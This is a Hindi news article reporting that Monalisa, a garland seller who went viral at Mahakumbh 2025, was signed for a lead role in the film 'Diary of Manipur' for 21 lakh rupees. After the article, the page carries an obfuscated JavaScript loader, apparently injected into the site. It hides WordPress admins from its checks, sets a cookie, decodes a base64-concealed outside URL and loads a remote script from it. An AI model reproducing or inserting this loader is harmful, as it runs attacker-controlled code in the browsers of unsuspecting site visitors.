News indiaa reporter— जसा राम
Monalisa fees for her debut महाकुंभ 2025 इन दिनों सुर्खियों में हैं. महाकुंभ से कई वीडियो और रिल्स भी जमकर वायरल हो रहे हैं. बीते दिनों एक लड़की अपनी आंखों की वजह से काफी चर्चा में रही. इस लड़की का नाम मोनालिसा है.
नई दिल्ली:
महाकुंभ 2025 इन दिनों सुर्खियों में हैं. महाकुंभ से कई वीडियो और रिल्स भी जमकर वायरल हो रहे हैं. बीते दिनों एक लड़की अपनी आंखों की वजह से काफी चर्चा में रही. इस लड़की का नाम मोनालिसा है. कत्थई आंखों वाली मोनालिसा की अब किस्मत बदल चुकी है, क्योंकि वह अब एक्ट्रेस बनने वाली हैं. जी हां, मोनालिसा जल्द बॉलीवुड फिल्म में नजर आने वाली हैं. उनकी फिल्म का नाम डायरी ऑफ मणिपुर है. इस फिल्म के लिए मोनालिसा का अच्छी-खासी फीस भी मिली है.

एनडीटीवी को मिली जानकारी के अनुसार मोनालिसा को फिल्म डायरी ऑफ मणिपुर के लिए 21 लाख रुपये की फीस मिली है. इसमें से एक लाख रुपये उन्हें साइनिंग अमाउंट के तौर पर दिए गए हैं. आपको बता दें कि महाकुंभ में अपनी कजरारी आंखों और प्यारी सी मुस्कान के चलते वायरल हुई मोनालिसा अब अपने घर यानी मध्य प्रदेश के महेश्वर लौट चुकी हैं. पूरे महाकुंभ के दौरान प्रयागराज में ही रूक कर रुद्राक्ष माला बेचने वाली थीं लेकिन 15 दिनों के अंदर ही उन्हें महाकुंभ छोड़ना पड़ा. क्योंकि वायरल होने के कारण न तो वह माला बेचने का अपना काम ठीक से कर पा रही थी और न ही चैन की सांस ले पा रही थी. पूरे वक्त उनके आगे पीछे कैमरे घूमने लग गए थे. अब जब वह अपने घर वापस आ चुकी हैं.
डायरेक्टर सनोज मिश्रा आज मोनालिसा के गांव पहुंचे और अपनी फिल्म डायरी ऑफ मणिपुर के लिए साइन किया. इस फिल्म में मोनालिसा लीड भूमिका में नजर आएगी. फिल्म की शूटिंग से पहले उन्हें मुंबई में एक्टिंग की ट्रेनिंग भी दी जाएगी. बता दें कि कुंभ में अचानक इंटरनेट पर वायरल होने के बाद मोनालिसा की सुंदरता और आकर्षक व्यक्तित्व ने मेले में आने वाले लोगों का ध्यान खींचा. तभी सनोज मिश्रा ने सोच लिया कि मोनालिसा को वह अपनी फिल्म में कास्ट करेंगे. डायरेक्टर सनोज मिश्रा इन दिनों फिल्म ‘डायरी ऑफ मणिपुर’ की तैयारी में जुटे हैं.
(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();
